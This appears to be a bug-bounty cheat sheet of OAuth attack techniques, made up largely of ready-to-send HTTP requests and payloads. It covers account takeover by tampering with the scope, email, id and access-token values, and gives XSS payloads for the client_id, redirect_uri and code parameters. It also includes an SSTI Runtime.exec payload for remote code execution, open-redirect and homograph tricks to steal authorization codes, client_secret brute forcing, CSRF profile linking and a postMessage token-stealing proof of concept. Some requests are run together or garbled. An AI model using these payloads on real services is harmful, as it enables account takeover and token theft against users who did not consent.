GET /oauth/Connect?response_type=code&client_id=ID&scope=openid%20email&redirect_uri=https://company.com&nonce=Randim&hd=gmail.com HTTP/1.1
Host:www.company.comUser-Agent:Mozilla/5.0Referer:https://previous.com/pathOrigin:https://www.company.comAccept-Encoding:gzip, deflate
Remove email from scope
Try To Remove Your Email From Scope Parameter While Signing Up OR Signing In With Services Provider To Get Account Takeover
Use Access Token Of Your App Instead Of Auth Token Of Victim App
1- Create Facebook App2- Generate Access Token3- Go To Victim App And Click On The Facebook Sign In Button With Intercepting Traffic Using Burp Suite4- Change Value Of auth_token Parameter To The Access Token5- Forward The Request And You Will Be Login Since There Is No Validation Weather The Access Token Generated For Victim App OR Other App
GET /oauth/Connect HTTP/1.1Host:me.com/www.company.comUser-Agent:Mozilla/5.0Content-Type:application/x-www-form-urlencodedOrigin:https://www.company.com
Insert Your Domain In Referer Header While
GET /oauth/Connect HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Content-Type:application/x-www-form-urlencodedReferer:https://me.com/pathOrigin:https://www.company.com
In OAuth Connect Request , Try To Insert admin@company.com as Value Of Email In Scope Parameter To Gain Extra Authorities OR Get More Functionalities
POST /oauth/Connect HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Content-Type:application/x-www-form-urlencodedContent-Length:Numberfirstname=I&lastname=am&image=URL&anti_csrf=CSRF&email=admin@company.com&access_token=******
IDOR in id= Parameter
In OAuth Connect Request , Try To Recall Id In Scope Then Try To Change This Id To Id Of Logged In Account To Takeover This Account
POST /oauth/Connect HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Content-Type:application/x-www-form-urlencodedContent-Length:Numberfirstname=I&lastname=am&image=URL&anti_csrf=CSRF&id=Id-Of-Another-Account&access_token=******
Add JSON OR XML Extension To OAuth Endpoint
In OAuth Connect Request , Try To Add JSON OR XML Extension To OAuth Endpoint e.g. oauth/connect.json , Maybe Token Expose In Response !
POST /oauth/Connect.json HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Content-Type:application/x-www-form-urlencodedContent-Length:Numbertype=token&client_id=ID&anti-csrf=&redirect_uri=URL
XSS in OAUTH Connect/Callback
GET /oauth/Connect?)%7D(alert)(location);%7B%3C!--&state=\&redirect_uri=URL&scope=read&type=code&client_id=ID& HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Referer:https://previous.com/pathOrigin:https://www.company.comAccept-Encoding:gzip, deflate
Insert XSS Payloads To Cause Errors
Try To Insert XSS Payloads e.g. XSS To Cause Errors
GET /oauth/Connect? client_id=<marquee loop=1 width=0 onfinish= pr\u006fmpt(document.domain)></marquee> HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Referer:https://me.com/pathOrigin:https://www.company.com
SSTI in Scope Parameter
In OAuth Connect Request Try To Insert SSTI Payloads In Scope Parameter e.g. ${T(java.lang.Runtime).getRuntime().exec("calc.exe")} To Get RCE
GET /oauth/Connect? type=code&client_id=ID&state=Random&redirect_uri=URL&scope=${T(Java.lang.Runtime).getRuntime(). exec("calc.exe")} HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Referer:https://previous.com/pathOrigin:https://www.company.comAccept-Encoding:gzip, deflate
XSS in RedirectUri
Try To Insert XSS Payloads As Value Of Redirect URL e.g. data:company.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src= xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E To GET DOM-Based XSS
GET /oauth/Connect?type=code&client_id=ID&state=Random&redirect_uri=data:company.com;text/html;charset=UTF-8,%3Chtml%3E%3Cscript%3Edocument.write(document.domain);%3C%2Fscript%3E%3Ciframe/src=xxxxx%3Eaaaa%3C/iframe%3E%3C%2Fhtml%3E&scope=read HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0-----------------------------POST /oauth/Connect HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Content-Type:application/x-www-form-urlencodedContent-Length:Numberclient_id=ID&client_secret=SECRET&type=Authorization&code=Auth_code&redirect_uri=javascript:fetch('XSS')
Path Traversal to open Redirect
Try To Insert Redirect URL Parameter To Redirect URL As Value To Steal The Authorization Code OR The Access Token
GET /oauth/Connect?type=code&client_id=ID&state=Random&redirect_uri=https://www.company.com.com/../../redirect_uri=https://me.com&scope=read HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Referer:https://previous.com/pathOrigin:https://www.company.com
Authentication Bypass via OAuth Implicit Flow
Study OAuth flow starting from the authorization request GET /auth?client_id=[...].
Client receives user info from the OAuth service.
Client logs in by sending a POST request to its /authenticate endpoint with user info and access token.
In Burp Repeater, modify the email in the POST request to impersonate another user.
Right-click the POST request, select "Request in browser" > "In original session", visit the URL, and log in as another user.
Forced OAuth Profile Linking
Sign in with a social media profile.
Capture the request that includes redirect_uri in /auth?client_id[...].
Check if the state parameter is present. If not, it’s vulnerable to CSRF.
Copy the request URL from Burp, drop the request, and turn off intercept.
Log out, send the link to the victim, or use an iframe on your website.
Victim's browser completes the OAuth flow, linking your profile to their account.
CSRF
- Integration Linking
- no state parameter or
- state parameter static value
- Remove static parameter
Insufficient Redirect URI Validation
Exploits:
Open Redirect: Redirect sensitive data to an attacker-controlled server.
Attacker can steal the code and state parameter using this code
POST-AUTH REDIRECT + LOGIN CSRF
There is endpoint vulnerable to open redirect using it to bypass redirect_uri Restrictions and using &response_mode=fragment to send code in url
The website is vulnerable to an open redirect. After a user logs in, we can exploit the state parameter to perform a CSRF attack, causing the user to log into our account after completing the OAuth process. However, to steal the user's session/code when they log into the attacker-owned account, we can use &response_mode=fragment. This will send the user's code to an attacker-controlled site in the URL after the # sign, along with the attacker's code in the query.
Disclosure of Secrets
Leaking client_secret allows attackers to generate access tokens and access user data.
Client Secret Brute Force
Brute force the client_secret to steal accounts.
POST /token HTTP/1.1
content-type: application/x-www-form-urlencoded
host: target-server
content-length: 135
Connection: close
code=authorization_code&redirect_uri=callback_url&grant_type=authorization_code&client_id=client_id&client_secret=[bruteforce]
Referrer Header Leaking Code + State
Verify if the code and state are reflected in the Referrer header when the user navigates to another page.
Access Token Stored in Browser History
Ensure access tokens are not stored in browser history.
Everlasting Authorization Code
Authorization code should have a short lifespan to limit the attack window.
Verify for potential race conditions that can lead to security issues.
Summary
OAuth implementations can be vulnerable to various security issues. By understanding these vulnerabilities and following the steps outlined, you can effectively test and secure OAuth flows.
Use IDN Homograph Attack To Spoof Redirect URL Parameter
Try To Use IDN Homograph Attack To Spoof Redirect URL Parameter To Steal The Authorization Code OR The Access Token
GET /oauth/Connect?type=code&client_id=ID&state=Random&redirect_uri=https://www.cṍmpany.com&scope=read HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Referer:https://previous.com/pathOrigin:https://www.company.com
Try To Insert Invisible Range %00 To %FF in The URL e.g. me.com%5bcompany.com As Value Of Redirect URL Parameter
Change Request Method
Try To Change Request Method To e.g. GET , POST , HEAD OR PUT To Understand How Company Routes The Different Methods in OAuth Flow
HEAD /oauth/Connect? type=code&client_id=ID&state=Random&redirect_uri=URL&scope=read HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Referer:https://previous.com/pathOrigin:https://www.company.comAccept-Encoding:gzip, deflate
Race Condition
Try To Figure Out Reaction Of The Server While Doing Race Condition By Using Turbo Intruder OR Nuclei To Send Simultaneously Requests
GET /oauth/Callback?code=Valid HTTP/1.1Host:www.company.comX-Test:%semail=victim@gmail.com&otp=wrongOTP
XSS in the code= parameter
Try To Insert XSS Payloads e.g. ,%2520alert(123))%253B// In The Authorization Code Parameter If Value Of Code Parameter Reflected
GET /oauth/Callback?code=,%2520alert(123))%253B// HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Referer:https://previous.com/pathOrigin:https://www.company.com
Reuse The Authorization Code With XSS Payloads
If The Authorization Code Is Used More Than Once Try To Reuse The Authorization Code With XSS Payloads e.g. Codealert('XSS')
POST /oauth/Callback HTTP/1.1Host:www.company.comUser-Agent:Mozilla/5.0Content-Type:application/x-www-form-urlencodedReferer:https://previous.com/pathOrigin:https://www.company.comContent-Length:Numberclient_id=ID&client_secret=SECRET&type=Authorization&code=Auth_Code<script>alert('XSS')</script>&redirect_uri=URL
Use The OAuth Token With Logged In User In OAuth Provider
*** If App Ask You Log In With OAuth Provider By Generating OAuth Token , Try To Use The OAuth Token With Logged In User In OAuth Provider
1 - I am logged in with app.com as Account One2 - I open appservice.com3 - I get https://api.app.com/oauth/?oauth_token=*****4 - I did not move forward and shared this link with someone whois logged in with app.com as Account Two5 - Account Two grants the permission to the third Party App appservice.com6 - Account One also grants the permission to the third Party Appappservice.com By Using The Same OAuth Token7 - I Get Dashboard Of appservice.com of Account Two Not Account One
Exploit Post Messages
Try To Use Whitelist Subdomain With Endpoint Contains postMessage(Msg,"*"); In which Msg = window.location.href.split("#")[1]; To Steal The Access Token
1 - search About :-var Msg = window.location.href.split("#")[1];window.parent.postMessage(Msg,"*");2 - There Isn't :-X-Frame-Options Header3 - Use This POC :-var exploit_url = 'https://company.com/oauth?client_id=id&redirect_uri=https://sub.company.com/postMsg.js';var i = document.createElement('iframe');document.body.appendChild(i);window.addEventListener('oauth', function(Token) {alert(Token.data.name);}, !1);
